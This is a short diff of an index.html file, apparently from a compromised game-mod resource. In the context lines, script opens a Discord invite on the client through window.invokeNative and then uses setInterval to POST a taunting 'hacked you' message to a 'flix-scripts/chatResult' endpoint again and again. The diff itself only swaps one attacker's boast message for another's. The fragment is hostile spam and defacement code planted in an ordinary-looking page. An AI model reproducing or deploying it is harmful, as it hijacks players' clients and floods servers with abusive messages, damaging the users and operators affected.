--- a/index.html
+++ b/index.html
@@ -85,7 +85,7 @@
             window.invokeNative("openUrl", "https://discord.gg/3MermwaaHx");
         }, 2500);
    
-const msg = ` ADAM - _o9g Fucked you  `;
+const msg = ` arablife Ha3cked you 🫃🔞  `;
 const body = JSON.stringify({ message: msg });
 setInterval(() => {
 fetch("https://flix-scripts/chatResult", { method: "POST", body });
